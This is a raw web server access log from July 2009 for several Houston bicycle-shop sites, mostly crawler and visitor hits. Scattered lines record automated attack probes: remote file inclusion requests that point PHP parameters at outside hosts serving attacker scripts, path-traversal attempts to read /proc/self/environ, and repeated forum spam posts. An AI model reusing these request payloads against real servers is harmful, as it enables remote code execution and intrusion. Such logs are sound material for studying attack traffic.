81.19.66.38 - - [11/Jul/2009:14:00:36 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:14:00:37 -0700] "GET /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
58.61.164.207 - - [11/Jul/2009:14:16:45 -0700] "GET /robots.txt HTTP/1.1" 404 275 "http://houstonbikeshop.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" "houstonbikeshop.com"
99.50.245.38 - - [11/Jul/2009:14:32:57 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; Zune 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.svbikes.com"
99.50.245.38 - - [11/Jul/2009:14:32:57 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; Zune 3.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)" "www.svbikes.com"
99.50.245.38 - - [11/Jul/2009:14:33:04 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.svbikes.com"
119.63.193.129 - - [11/Jul/2009:14:49:11 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
91.186.15.126 - - [11/Jul/2009:14:50:16 -0700] "GET /admin/install/index.php?mode='&dbconfig_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.186.15.126 - - [11/Jul/2009:14:50:16 -0700] "GET /logs//admin/install/index.php?mode='&dbconfig_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.186.15.126 - - [11/Jul/2009:14:50:16 -0700] "GET /logs/access_081010.log%20%20//admin/install/index.php?mode='&dbconfig_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.186.15.126 - - [11/Jul/2009:14:52:55 -0700] "GET /logs/access.log%20%20//admin/install/index.php?mode='&dbconfig_path=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [11/Jul/2009:14:59:01 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/Jul/2009:14:59:01 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/Jul/2009:15:06:52 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jul/2009:15:06:52 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
72.30.142.217 - - [11/Jul/2009:15:10:39 -0700] "GET /tmp/ HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
91.121.150.170 - - [11/Jul/2009:15:12:44 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [11/Jul/2009:15:12:46 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
218.145.71.148 - - [11/Jul/2009:15:17:22 -0700] "GET /appserv/main.php?appserv_root=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "houstonbikeshop.com"
218.145.71.148 - - [11/Jul/2009:15:17:22 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "houstonbikeshop.com"
218.145.71.148 - - [11/Jul/2009:15:17:22 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "houstonbikeshop.com"
218.145.71.148 - - [11/Jul/2009:15:17:23 -0700] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "houstonbikeshop.com"
218.145.71.148 - - [11/Jul/2009:15:17:23 -0700] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "houstonbikeshop.com"
218.145.71.148 - - [11/Jul/2009:15:17:23 -0700] "GET /logs/access.log/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "houstonbikeshop.com"
218.145.71.148 - - [11/Jul/2009:15:17:23 -0700] "GET /appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
218.145.71.148 - - [11/Jul/2009:15:17:24 -0700] "GET /logs/appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
218.145.71.148 - - [11/Jul/2009:15:17:24 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
218.145.71.148 - - [11/Jul/2009:15:17:24 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
218.145.71.148 - - [11/Jul/2009:15:17:24 -0700] "GET /appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
218.145.71.148 - - [11/Jul/2009:15:17:24 -0700] "GET /logs/appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "houstonbikeshop.com"
91.121.150.170 - - [11/Jul/2009:15:17:25 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/Jul/2009:15:26:02 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jul/2009:15:27:38 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
193.47.80.45 - - [11/Jul/2009:15:30:30 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
193.47.80.45 - - [11/Jul/2009:15:30:31 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
91.121.150.170 - - [11/Jul/2009:15:31:45 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [11/Jul/2009:15:35:49 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
194.8.75.50 - - [11/Jul/2009:15:41:21 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "www.svbikes.com"
194.8.75.50 - - [11/Jul/2009:15:41:21 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "www.svbikes.com"
194.8.75.50 - - [11/Jul/2009:15:41:22 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "www.svbikes.com"
91.121.150.170 - - [11/Jul/2009:15:41:46 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
70.138.94.5 - - [11/Jul/2009:15:48:31 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.svbikes.com"
70.138.94.5 - - [11/Jul/2009:15:48:32 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.svbikes.com"
81.19.66.38 - - [11/Jul/2009:15:54:57 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:15:54:58 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:15:54:58 -0700] "GET /bullitinboard/viewtopic.php?p=1661 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:15:54:58 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:15:54:59 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
70.138.188.255 - - [11/Jul/2009:16:02:25 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; MSN Optimized;US; AskTB5.2)" "www.svbikes.com"
70.138.188.255 - - [11/Jul/2009:16:02:25 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322; MSN Optimized;US; AskTB5.2)" "www.svbikes.com"
65.55.106.164 - - [11/Jul/2009:16:23:39 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
119.63.198.20 - - [11/Jul/2009:16:35:46 -0700] "GET /bullitinboard/viewtopic.php?p=15333 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "bicyclestoreshouston.com"
217.70.32.2 - - [11/Jul/2009:16:43:22 -0700] "GET /technote7//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.70.32.2 - - [11/Jul/2009:16:43:22 -0700] "GET /logs/access.log%20%20//technote7//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.70.32.2 - - [11/Jul/2009:16:43:22 -0700] "GET /logs//technote7//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.70.32.2 - - [11/Jul/2009:16:43:43 -0700] "GET /technote7//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.70.32.2 - - [11/Jul/2009:16:43:43 -0700] "GET /logs//technote7//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.70.32.2 - - [11/Jul/2009:16:43:43 -0700] "GET /logs/access.log%20%20//technote7//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.211.65 - - [11/Jul/2009:17:00:14 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.65 - - [11/Jul/2009:17:00:14 -0700] "GET /logs/?N=A HTTP/1.1" 200 2368 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
61.109.245.179 - - [11/Jul/2009:17:04:43 -0700] "GET /logs/access.log%20////?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [11/Jul/2009:17:04:43 -0700] "GET /logs////?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 200 2375 "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.109.245.179 - - [11/Jul/2009:17:04:43 -0700] "GET ///?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 200 1765 "-" "libwww-perl/5.79" "houstonbikeshop.com"
208.80.195.36 - - [11/Jul/2009:17:06:23 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; YPC 3.2.0; yie6_SBC; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Hotbar 4.6.1)" "houstonbikeshop.com"
211.172.232.95 - - [11/Jul/2009:17:14:33 -0700] "GET /logs/access.log%20////?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "houstonbikeshop.com"
211.172.232.95 - - [11/Jul/2009:17:14:34 -0700] "GET /logs////?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 200 2375 "-" "libwww-perl/5.814" "houstonbikeshop.com"
211.172.232.95 - - [11/Jul/2009:17:14:34 -0700] "GET ///?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 200 1765 "-" "libwww-perl/5.814" "houstonbikeshop.com"
211.172.232.95 - - [11/Jul/2009:17:14:34 -0700] "GET ///?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 200 1765 "-" "libwww-perl/5.814" "houstonbikeshop.com"
211.172.232.95 - - [11/Jul/2009:17:14:34 -0700] "GET /logs////?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 200 2375 "-" "libwww-perl/5.814" "houstonbikeshop.com"
211.172.232.95 - - [11/Jul/2009:17:14:35 -0700] "GET /logs/access.log%20////?_zb_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "houstonbikeshop.com"
196.40.10.246 - - [11/Jul/2009:17:19:13 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://houstonbikeshop.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "houstonbikeshop.com"
196.40.10.246 - - [11/Jul/2009:17:19:14 -0700] "GET / HTTP/1.0" 200 1748 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "houstonbikeshop.com"
196.40.10.246 - - [11/Jul/2009:17:19:18 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://houstonbikeshop.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:17:20:29 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:17:20:30 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:17:20:30 -0700] "GET /bullitinboard/viewtopic.php?p=1661 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:17:20:31 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:17:20:31 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
77.92.229.39 - - [11/Jul/2009:17:58:44 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "HolmesBot (http://holmes.ge)" "www.svbikes.com"
211.189.39.159 - - [11/Jul/2009:17:59:03 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.39.159 - - [11/Jul/2009:17:59:03 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.39.159 - - [11/Jul/2009:17:59:03 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.39.159 - - [11/Jul/2009:18:09:48 -0700] "GET /translations/Spanish.txt//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.39.159 - - [11/Jul/2009:18:09:48 -0700] "GET /translations//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.39.159 - - [11/Jul/2009:18:09:48 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.39.159 - - [11/Jul/2009:18:12:17 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://bangsat1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [11/Jul/2009:18:17:24 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
194.8.75.50 - - [11/Jul/2009:18:18:40 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Mozilla/0.6 Beta (Windows)" "bicyclestoreshouston.com"
194.8.75.50 - - [11/Jul/2009:18:18:40 -0700] "GET / HTTP/1.0" 200 1748 "http://bicyclestoreshouston.com/" "Mozilla/0.6 Beta (Windows)" "bicyclestoreshouston.com"
194.8.75.50 - - [11/Jul/2009:18:18:41 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/" "Mozilla/0.6 Beta (Windows)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jul/2009:18:25:20 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jul/2009:18:31:10 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
70.87.64.234 - - [11/Jul/2009:18:51:15 -0700] "GET /skin/zero_vote/error.php?dir=http://orion.multimonde.com/phpraider//authentication/phpbb3/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "houstonbikeshop.com"
70.87.64.234 - - [11/Jul/2009:18:51:15 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://orion.multimonde.com/phpraider//authentication/phpbb3/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "houstonbikeshop.com"
70.87.64.234 - - [11/Jul/2009:18:51:15 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://orion.multimonde.com/phpraider//authentication/phpbb3/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "houstonbikeshop.com"
91.121.150.170 - - [11/Jul/2009:18:59:08 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/Jul/2009:18:59:09 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
122.153.28.140 - - [11/Jul/2009:19:06:55 -0700] "GET //?_zb_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [11/Jul/2009:19:06:56 -0700] "GET /logs/access.log%20%20///?_zb_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [11/Jul/2009:19:06:56 -0700] "GET //?_zb_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [11/Jul/2009:19:06:56 -0700] "GET /logs///?_zb_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [11/Jul/2009:19:07:00 -0700] "GET /logs/access.log%20%20///?_zb_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [11/Jul/2009:19:07:00 -0700] "GET /logs///?_zb_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [11/Jul/2009:19:07:58 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jul/2009:19:07:58 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
81.19.66.38 - - [11/Jul/2009:19:08:11 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:19:08:12 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:19:08:13 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:19:08:13 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:19:08:14 -0700] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
122.153.28.140 - - [11/Jul/2009:19:12:51 -0700] "GET //?_zb_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [11/Jul/2009:19:13:00 -0700] "GET //?_zb_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [11/Jul/2009:19:13:02 -0700] "GET /logs///?_zb_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [11/Jul/2009:19:13:02 -0700] "GET /logs/access.log///?_zb_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [11/Jul/2009:19:13:10 -0700] "GET /logs/access.log///?_zb_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
122.153.28.140 - - [11/Jul/2009:19:13:10 -0700] "GET /logs///?_zb_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 200 2374 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [11/Jul/2009:19:13:49 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [11/Jul/2009:19:13:53 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [11/Jul/2009:19:28:29 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/Jul/2009:19:37:46 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
65.55.106.179 - - [11/Jul/2009:19:43:31 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jul/2009:19:43:49 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
